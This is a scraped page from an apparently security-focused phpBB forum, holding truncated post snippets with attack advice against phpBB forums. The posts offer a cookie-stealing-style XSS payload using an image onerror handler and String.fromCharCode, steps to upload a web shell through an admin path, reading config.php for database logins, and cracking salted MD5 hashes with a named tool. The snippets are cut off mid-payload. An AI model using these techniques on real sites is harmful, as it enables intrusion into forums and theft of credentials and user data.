|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 76
Members: 0
Total: 76
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
|
it's not a hash, this is user identifier in phpbb forum version 2.0.18/19....
so it cann't be decoded. the real hash is stored in data base and didn't transmitted in cookies |
|
|
|
|
try this XSS, but it correct works with version 1.05, about 1.07 i didn't now
[im*g]http://re [flash=200,200]http://w onerror=img=new/**/Image();a=String.fromCharCode(104,116,116,112,58,47,47...her ... |
|
|
|
|
you can try to upload shell...first of all find the installation directory of the forum...for example ...../admin/admin_disallow.php?setmodules=1..after this you get it,
then you must to edit the dat ... |
|
|
|
|
for example "cat config.php" ......at the top of the this file you can find usefull information, such login, password, data base location. this expoits give you possibility to upload shell...for examp ... |
|
|
|
|
you can use this program http://www.insidepro.com/eng/passwordspro.shtml it supports salt md5 hashes also |
|
|
Page 1 of 1 |
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|